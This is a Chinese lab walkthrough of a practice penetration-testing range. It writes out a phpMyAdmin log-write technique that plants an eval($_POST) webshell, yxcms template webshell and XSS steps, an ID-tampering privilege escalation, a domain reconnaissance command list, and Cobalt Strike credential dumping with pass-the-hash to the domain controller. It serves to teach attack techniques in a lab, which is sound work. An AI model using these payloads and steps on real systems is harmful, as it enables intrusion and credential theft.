免责声明

❝

本文仅用于技术讨论与学习，利用此文所提供的信息或工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任!如有侵权请告知我们立即删除。

❞

一、环境搭建

网卡配置

win7使用两张网卡

server2003、server2008

二、信息收集

端口扫描

Nmap scan report for 192.168.92.135

80/tcp   open  http    Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
3306/tcp open  mysql   MySQL (unauthorized)

铭感目录

phpinfo.php、phpmyadmin、yxcms

三、漏洞发现

一 phpMyAdmin

通过phpmyadmin getshell的方法：https://www.freebuf.com/articles/web/226240.html
弱口令root:root进入后台
通过 select @@datadir;命令得到了路径

我们查看secure_file_priv是否为NULL，如果是NULL则无法创建文件

还可以使用日志写入木马，使用 show variables like '%general%';命令查看日志全局变量

使用 set global general_log = "ON";命令开启日志保存，使用set global general_log_file = "C:/phpstudy/WWW/log.php"; 命令更改日志保存路径

使用select '<?php eval($_POST[pwd]); ?>'命令写入木马

使用蚁剑连接成功

二 yxcms

    通过弱口令登录成功，在前台模板，编辑首页文件       

写入木马

连接成功

当后台访问留言版的时候就会弹窗

如果审核通过主页访问留言板也会弹窗

文件上传pdf造成xss，这里还可以上传flash文件也可以造成xss

访问这个pdf文件地址弹窗

3. 水平越权
注册两个会员用户

在资料完善中

抓包发现id=3我们修改成2

test1账号的资料成功被修改

四、内网渗透

一 信息收集

cs生成木马上传蚁剑

常用信息收集命令：
ipconfig /all            # 查看本机ip,所在域
route print              # 打印路由信息
arp -a                   # 查看arp缓存
net view                 # 查看局域网内其他主机名
net config Workstation   # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user                 # 查看本机用户列表
net user /domain         # 查看域用户
net localgroup administrators # 查看本地管理员组（通常会有域用户）
net view /domain         # 查看有几个域
net user 用户名 /domain   # 获取指定域用户的信息
net group /domain        # 查看域里面的工作组，查看把用户分了多少组（只能在域控上操作）
net group 组名 /domain    # 查看域中某工作组
net group "domain admins" /domain  # 查看域管理员的名字
net group "domain computers" /domain  # 查看域中的其他主机名
net group "doamin controllers" /domain  # 查看域控制器主机名（可能有多台）

先设置间隔时间为0（真实环境默认就好，越快的话就越容易暴露）

shell systeminfo

net config Workstation发现本机是工作站

net view 查看局域网内其他主机名

通过cs得到hash值及明文密码

二 横向渗透

在视图查看目标列表

先通过hash值碰撞拿下域控

创建SMB监听器，选择会话

后面步骤一样的